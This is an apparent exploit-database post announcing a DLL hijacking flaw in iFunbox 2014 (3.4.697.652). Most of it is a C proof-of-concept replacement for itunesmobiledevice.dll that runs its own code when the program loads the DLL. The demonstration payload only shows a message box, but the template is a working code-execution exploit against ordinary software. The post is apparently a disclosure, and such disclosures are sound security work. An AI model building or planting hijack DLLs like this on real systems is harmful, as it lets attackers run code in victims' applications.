iFunbox 2014 version 3.4.697.652 suffers from a DLL hijacking vulnerability.
f033e80213c84a7e20b391dabec5c66d13570107fda94bfe9a7516a5665fc8cc
/*
* Exploit Title:iFunbox 2014 3.4.697.652 DLL Hijacking Exploit (itunesmobiledevice.dll)
* Date: 25/12/2014
* Author: Hadji Samir s-dz@hotmail.fr
* Vendor Homepage: http://i-funbox.com/
*Soft link :http://dl.i-funbox.com/ifunbox2014_setup.exe
* Tested on: windows 7 fr
*/
#include <windows.h>
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
owned();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int owned() {
MessageBox(0, "iFunbox DLL Hijacked\Hadji Samir", "POC", MB_OK);
}